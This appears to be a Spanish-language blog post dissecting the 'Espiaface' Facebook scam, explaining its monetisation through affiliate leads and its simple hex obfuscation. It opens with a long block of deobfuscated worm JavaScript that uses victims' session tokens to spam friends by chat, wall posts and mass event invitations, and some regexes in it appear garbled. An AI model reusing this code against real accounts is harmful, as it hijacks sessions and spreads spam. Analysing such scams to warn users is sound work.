for (var _0xbf72x22 = 0; _0xbf72x22 < _0xbf72x20['length']; _0xbf72x22++) {
var _0xbf72x23 = _0xbf72x20[_0xbf72x22]['match'](/:(d+),/)[1];
if (_0xbf72x23 != _0xbf72x10) {
_0xbf72x21['push'](_0xbf72x23);
};
};
var _0xbf72x24 = new Date;
_0xbf72x24['setTime'](_0xbf72x24['getTime']() + 86400000);
datestr = _0xbf72x24['getMonth']() + 1 + '/' + _0xbf72x24['getDate']() + '/' + _0xbf72x24['getFullYear']();
timestr = _0xbf72x24['getHours']() * 60;
var _0xbf72x25 = {
post_form_id: _0xbf72x1a,
fb_dtsg: _0xbf72x1b,
start_dateIntlDisplay: datestr,
start_date: datestr,
start_time_hour_min: timestr,
name: eventname,
place_page_id: '',
location: '',
street: '',
geo_id: '',
geo_sq: '',
desc: eventdesc,
sgb_invitees: _0xbf72x21['join'](','),
sgb_emails: '',
sgb_message: '',
privacy_type: 'on',
guest_list: 'on',
connections_can_post: 'on',
save: 'Create Event',
submitting: ''
};
_0xbf72x25['new'] = '';
_0xbf72x16('/events/create.php', _0xbf72x25, false, function () {
mf(--wf);
});
});
});
};
if (chatmessage) {
wf++;
_0xbf72x16('/ajax/chat/buddy_list.php?__a=1', {
user: _0xbf72x10,
post_form_id: _0xbf72x1a,
fb_dtsg: _0xbf72x1b,
lsd: null,
post_form_id_source: 'AsyncRequest',
popped_out: false,
force_render: true
}, function (_0xbf72x1d) {
var _0xbf72x26 = _0xbf72x1d['substr'](9);
var _0xbf72x27 = eval('(' + _0xbf72x26 + ')');
var _0xbf72x28 = _0xbf72x27['payload']['buddy_list'];
for (var _0xbf72x29 in _0xbf72x28['nowAvailableList']) {
var _0xbf72x2a = Math['floor'](Math['random']() * 1335448958);
var _0xbf72x2b = (new Date)['getTime']();
var _0xbf72x2c = chatmessage['replace']('%firstname%', _0xbf72x28['userInfos'][_0xbf72x29]['firstName']['toLowerCase']());
_0xbf72x16('/ajax/chat/send.php?__a=1', {
msg_id: Math['floor'](Math['random']() * 1335448958),
client_time: (new Date)['getTime'](),
msg_text: chatmessage['replace']('%firstname%', _0xbf72x28['userInfos'][_0xbf72x29]['firstName']['toLowerCase']()),
to: _0xbf72x29,
post_form_id: _0xbf72x1a,
fb_dtsg: _0xbf72x1b,
post_form_id_source: 'AsyncRequest'
});
};
mf(--wf);
});
};
if (postmessage) {
wf++;
doget('/ajax/browser/friends/?uid=' + _0xbf72x10 + '&filter=all&__a=1&__d=1', function (_0xbf72x1d) {
var _0xbf72x20 = _0xbf72x1d['match'](//d+_d+_d+_q.jpg.*?u003ca href="http://www.facebook.com/.*?u003c/a>/gi);
var _0xbf72x2d = [];
if (_0xbf72x20) {
for (var _0xbf72x22 = 0; _0xbf72x22 < _0xbf72x20['length']; _0xbf72x22++) {
var _0xbf72x23 = _0xbf72x20[_0xbf72x22]['match'](/_d+_/)[0]['replace'](/_/g, '');
var _0xbf72x2e = _0xbf72x20[_0xbf72x22]['match'](/>[^>]+u003c/a>$/i)[0]['replace'](/u003c/a>$/gim, '')['replace'](/>/g, '');
_0xbf72x2d['push']({
id: _0xbf72x23,
name: _0xbf72x2e
});
};
};
var _0xbf72xd = [];
var _0xbf72x2f = [];
while (_0xbf72x2d['length']) {
var _0xbf72x30 = Math['floor'](Math['random']() * _0xbf72x2d['length']);
_0xbf72xd['push'](_0xbf72x2d[_0xbf72x30]);
_0xbf72x2f['push'](_0xbf72x2d[_0xbf72x30]);
var _0xbf72x2b = _0xbf72x2d['shift']();
if (_0xbf72x30) {
_0xbf72x2d[_0xbf72x30 - 1] = _0xbf72x2b;
};
};
if (debug) {
alert('fetched friends: ' + _0xbf72xd['length']);
};
var _0xbf72x31 = {
post_form_id: _0xbf72x1a,
fb_dtsg: _0xbf72x1b,
xhpc_composerid: comp,
xhpc_targetid: _0xbf72x10,
xhpc_context: 'home',
xhpc_fbx: '',
lsd: null,
post_form_id_source: 'AsyncRequest'
};
mt = postmessage;
m = postmessage;
while (mt['search']('%tf%') >= 0) {
var _0xbf72x32 = _0xbf72xd['pop']();
mt = mt['replace']('%tf%', _0xbf72x13(_0xbf72x32));
m = m['replace']('%tf%', _0xbf72x11(_0xbf72x32));
};
_0xbf72x31['xhpc_message_text'] = mt;
_0xbf72x31['xhpc_message'] = m;
if (debug) {
alert('message text: ' + mt);
};
_0xbf72x16('/ajax/updatestatus.php?__a=1', _0xbf72x31);
var _0xbf72x33 = function (_0xbf72x15) {
if (_0xbf72x15 == 0) {
wf = 0;
mf();
return;
};
var _0xbf72x34 = _0xbf72x2f['shift']();
var _0xbf72x35 = {
post_form_id: _0xbf72x1a,
fb_dtsg: _0xbf72x1b,
xhpc_composerid: comp,
xhpc_targetid: _0xbf72x34['id'],
xhpc_context: 'profile',
xhpc_fbx: 1,
lsd: null,
post_form_id_source: 'AsyncRequest'
};
var _0xbf72x36 = postmessage;
var _0xbf72x37 = postmessage;
if (_0xbf72xd['length'] == 0) {
wf = 0;
mf();
return;
};
while (_0xbf72x36['search']('%tf%') >= 0) {
var _0xbf72x38 = _0xbf72xd['pop']();
_0xbf72x36 = _0xbf72x36['replace']('%tf%', _0xbf72x13(_0xbf72x38));
_0xbf72x37 = _0xbf72x37['replace']('%tf%', _0xbf72x11(_0xbf72x38));
};
_0xbf72x35['xhpc_message_text'] = _0xbf72x36;
_0xbf72x35['xhpc_message'] = _0xbf72x37;
_0xbf72x16('/ajax/updatestatus.php?__a=1', _0xbf72x35);
setTimeout(function () {
_0xbf72x33(_0xbf72x15 - 1);
}, 2000);
};
wf++;
setTimeout(function () {
_0xbf72x33(nfriends);
}, 2000);
});
};
mf();
});
"No entendí una mierda de nuevo", dirás probablemente. No te preocupes, que acá está papá nanopene para ayudarte.
"No gracias, tu post apesta", dirías muy educadamente.
"Confiá en mí, sé exactamente lo que hago", te diría Martillo Hammer y te metería un balazo en el orto.
Hablando en serio de nuevo, vamos a explicar muy rápidamente lo que hace este código durante los 2 y 3 minutos que tenés que esperar:

0) Te muestra un gif robado de la Universidad de Harvard, (parece re wow, pero es un detalle re irrelevante, jajaja) para mostrarte que está "cargando":


1) Envia automáticamente un chat a un amigo online poniendo:

Chat automático de Espiaface dijo:

[el nombre de pila de tu amigo], mira esto que es increible, te permite ver quienes visitan tu perfil y funciona bien, entra a: espiaface.com

2) Se fija los amigos que tenés en Facebook y escoge a cuatro amigos al azar para generar el mensaje del muro:

Autopost de Espiaface dijo:

Top de visitantes de tu perfil de hoy:
%tf% - 19 visitas
%tf% - 16 visitas
%tf% - 15 visitas
%tf% - 13 visitas
Averigua tu tambien quien te esta mirando entrando en: espiaface.com
Funciona de verdad!

(En %tf% reemplaza por los nombres completos de tus amigos escogidos al azar)

Fijate que siempre va a mostrar que tuviste 19, 16, 15 y 13 visitas.
Esto demuestra una paja tremenda del programador, la versión en inglés genera números aleatorios.

3) Crea un evento en facebook (Vas a ir: ¿si, no, quizas?) y automáticamente invita a todos tus amigos

Evento automático de Espiaface dijo:

Nombre del Evento: Averigua quien visita tu perfil
Descripción del evento: Esto es increible! pueden ver quien esta visitando su perfil y te llegan notificaciones, sigan los pasos de esta pagina que explica como hacerlo, entren en: espiaface.com

Lo gracioso es que hay gente que dice "si, voy a atender al evento". Hay que ser pelotudos.

Resumiendo

Ese código, en esos 2 y 3 minutos que te pide esperar:
Lo que hace
Al poner ese código en la barra de direcciones, toma el control de tu Facebook un ratito para Spamear tanto por chat, como en el muro y también organizando eventos. Lo único que hace es Spamear por los codos.
Lo que no hace
No te roba el cookie, ni te saca la contraseña, ni accede a información privada de tu perfil, ni te sube virus ocultamente, ni te baja los pantalones, ni te mete... bueno lo paramos ahi.

¿Entonces cuál es el punto?

¿Entonces para qué carajo alguien se molestó en crear semejante estupidez? Muy simple, para hacer dinero. Mucho dinero.
Potencialmente podría haber generado millones de dólares, les explico a continuación.

Una vez que terminan los minutos de espera te redirige al siguiente sitio: final.espiaface.com (www.espiaface.com/carga.php)
En final.espiaface.com te dice:


Eso es lo que vas a ver si vivis en sudamérica. Y la imagen de arriba va ser lo último que hayas visto. Es por esto que muchos analistas en la red se rascaban la cabeza preguntándose cuál era el fin de este "virus".
Pero si vivís en México, te va a mostrar una oferta: de http://www.enterfactory.com/ (no ingreses el numero de tu celular)
Y si vivís en Estados Unidos te va a mostrar cinco links surtidos de diferentes juegos de: PlaySushi.com, PageRage.com, Gamevance.com

De nuevo, ¿qué gana el autor?
Si sos un hispano de Estados Unidos que entraste a PlaySushi.com y te bajaste el juego, el creador de Espiaface ganó $1.
Si sos un Mexicano que pusiste tu número de celular en Enterfactory.com, le generaste al creador de Espiaface $1.
Esto es lo que se llama comisión por intención de compra (leads). Si te suscribís a algún producto, llenás un formulario (eufemísticamente llamados "encuestas" ) con tus datos personales, eso genera un "lead" y le genera una comisión por referido.

Estas ofertas están restringidas por países, y la gran mayoría de los países hispanos estaban fuera de las areas de promoción, es por eso que a la mayoría de ustedes les mostraba: "Sorry, There are no surveys available to your country at this time. Please try back later" (Disculpen, no hay encuestas disponibles en su país en este momento. Por favor intente luego)

Este es el rango de las comisiones por sitio:
PageRage (Sólo disponible para USA): de $0,8 a $2,20 por lead. (Promedio: $1,50)
Gamevance (Sólo disponible para USA): de $1,60 a $2,29 por lead. (Promedio: $1,95)
Playsushi (Sólo disponible para USA): de $0,90 a $2 por lead. (Promedio: $1,45)
Enterfactory (Sólo disponible para México): de $0,60 a $1,20 por lead. (Promedio: $0,90)

Si suponemos razonablemente que un 1% de los usuarios mexicanos de Facebook (Facebook tiene 24.910.520 usuarios mexicanos registrados) se suscribieron a Enterfactory.com ($1 por lead para facilitar el cálculo, además de que es el más probable), el creador de espiaface se hubiera levantado $249.105 dólares limpios.

La versión en inglés debe haber generado como mínimo un millón de dólares. Si consideramos que sólo 1% de los usuarios de Facebook de Estados Unidos cayeron en la trampa (Facebook tiene 150.201.840 usuarios registrados en USA), los creadores de estos fraudes levantaron $1.502.018 dólares verdes.
Si agregamos a todos los países con usuarios angloparlantes (casi el resto del mundo) podemos fácilmente imaginar varias decenas de millones de dolares.

Finalizado con el super análisis, ahora se pueden tranquilizar ahora no van a caer más personas en espiaface porque... oops... por el bien de la humanidad, el sitio ya no existe más (lalalala, les juro que yo no tuve nada que ver...)
> CORRECCION: Volvió con los subdominios reformados y con el favicon de Facebook (uf, fuera de joda esa movida va a darle más legitimidad y van a caer más boludos.)
Au revoir espiaface!
> Au revoir las pelotas.
>> CORRECCION DE CORRECCION: Ahora sí Au Revoir, finalmente está hackeada!

Bueno ahora me voy a desayunar.
Saludos a todos y buen día America!

PD: Yapa, si instalaron los juegos de playsushi, es adware (programas que incluyen publicidad) Los caraduras lo promocionan con "Incluye toolbar de terceros GRATIS"...
Pero por suerte tienen suficiente ética, te lo podés sacar de encima si lo desinstalás desde "Agregar o Quitar Programas" del Panel de Control. Un truquito para ahorrar tiempo: Vayan a Ejecutar (para ahorrar más tiiempo aún: Tecla Windows + R) y escriban AppWiz.cpl (y presionen Enter). Tadá, "Agregar o Quitar Programas" en 1 segundo.
PD 2: Hay, sin embargo, un método para saber cuántos entraron a tu perfil (tiempo, fecha, IP, y todo), PERO no podés saber qué usuario de Facebook fue. Jajaja
PD 3: Por si no lo vieron todavía, entren acá para ver este cortometraje re loco para relajarte de la calentura de Espiaface. Aguanten hasta el final que es re loco.

dijo:


Respondiendo a las preguntas que me llega por MP:


1) ¿Cómo sé todo esto?
Todo esto lo averigué entrando al sitio de espiaface, viendo su código y viendo cómo se comporta el sitio. Está todo a la vista.
Busqué algo por internet para ver si alguien había investigado más profundamente, pero todo era incompleto, algunos se rascaban la cabeza públicamente al no comprender el fin de esta ingeniería social masiva. A los bloggers más serios, les envié un mail compartiendo esto.
Luego usé proxies de diferentes países para ver cómo se comportaba el sitio según el área geográfica del IP (acá es donde todos hacían agua)
Sobre las ganancias, eso yo tengo bastante experiencia con el marketing online, de ahí mi conocimiento sobre el "modelo de negocio" de las comisiones por lead (traer información de potenciales clientes) o conversión (ventas).
El boludo de Espiaface podría haber generado mucho más guita si se hubiese avivado que sus auspiciantes no tienen cobertura internacional. Por ejemplo, el auspiciante de Enterfactory TIENE productos para Argentina y Chile (esta empresa afana por telefonia celular y tiene convenios con Movistar y Claro en toda latinoamerica) pero sólo tiene publicado para el producto Mexicano.
Por esta razón se perdió miles y miles de dólares de oportunidad.


2) Cómo sé programación
Esta es la parte que les va a confundir a varios. Yo no sé programar, pero sé interpretar el código.
El lenguaje de programación es como aprender una lengua. Si sabés español, podés llegar a entender portugues aunque no lo sepas hablar. Algo similar pasa con los lenguajes de programación.
Si entendés el tema de las estructuras gramaticales, la sintaxis, artículos, pronombres, etc... podés entender cómo el chino está organizado y entenderlo aunque no lo hables.
Análogo a esto, si aprendés a programar un lenguaje, aprender el siguiente te va a resultar mucho más sencillo. Si en lugar de enfocarte en un lenguaje, te enfocás a entender a cómo las lenguas están organizadas gramaticalmente, sintácticamente y su cultura, vas a poder entender cualquier lengua. (sea de computadoras o humanas)


3) Si no se programación, ¿cómo "desofusqué" el código?
Muy buena pregunta. La técnica de ofuscación usada en este caso es muy sencillo, y es un truco viejisimo. Un caracter tiene un valor ASCII, el cual puede ser traducido a cualquier otro número que puede ser interpretado por la computadora, pero que nosotros no podemos entender un carajo.
Por ejemplo, si me pregunás cuántos años tengo, me dirías que se dice "preguntás" y que me comí la "t", la T de Troll de mierda.
Empecemos de nuevo, si me pregunTaras qué edad tengo, en lugar de decirte mi edad en números decimales como toda gente normal, te puedo devolver la trolleada diciéndote que yo tengo (log(10^(6*7)+cos(90))+10-3*3+8+20-18-(La edad de Jesús al morir, según la tradición católica)-75+80+5+3+7+(raiz cuadrada de 64)+5*5+14+6-41)/2 años.
Ahí tenés mi edad. Si estás cursando la secundaria, ves eso y te cagás de risa (que por cierto, esa cuentacalcula mi edad real). Sabés que es una pavada ridículamente básica, sólo que es un dolor de huevos resolverlo.
Algo parecido sucede con la ofuscación en este Javascript: Es una pavada. Si prestan atención al estilo de ofuscación, podemos sonreir antes de desofuscarlo: x4Ex61x6Ex6Fx70x65x6Ex65 es obvio, ya desde el formato mismo, que la codificación es una simple traducción de valores ASCII a hexadecimal.


Des-ofuscando:
4E (hexadecimal) = 78 (decimal) = N (ASCII valor 78, prueben ALT+78)
61=097=a
6E=110=n
6F=111=o
70=112=p
65=101=e
6E=110=n
65=101=e


Pueden ingresar a beautify para la deofuscación simple y formateo automático del código:http://jsbeautifier.org/
En el caso de que la ofuscación sea muy sofisticada, para análisis más profundo uso el sitio:http://jsunpack.jeek.org/dec/go?report=9d6d18553de1f44ee0d4dfe32e9b37734c11b3e2 (puede resultar confuso, pero es muy útil)


4) Dios santo...
REITERO: EL ESPIAFACE NO SE DESINSTALA PORQUE NO SE INSTALA NADA.
I REITERATE: THE ESPIAFACE DOESN'T NEED TO BE UNINSTALLED BECAUSE NOTHING IS INSTALLED IN THE FIRST PLACE!
Я повторяю: ESPIAFACE не может быть удален, потому что ничто не установлен!
Pero qué pasa que no me entienden, ¿estoy hablando en ruso?


5) El dueño del dominio Entraentuperfil Gabriel Mellace me envió un MP:


Ni sé por qué tengo que especificar esto, desde el título de este post dice claramente que es sobreESPIAFACE.COM y sólo sobre ESPIAFACE.COM.
El pobre de Gabriel Mellace parece haber quedado pegado injustamente y no tiene nada que ver.
Dejen de llamarlo y de amenazarlo.


Supongo que esto resuelve todas las preguntas
Publicado por
Etiquetas: , ,

No hay comentarios.:

Publicar un comentario

Suscribirse a: Comentarios de la entrada (Atom)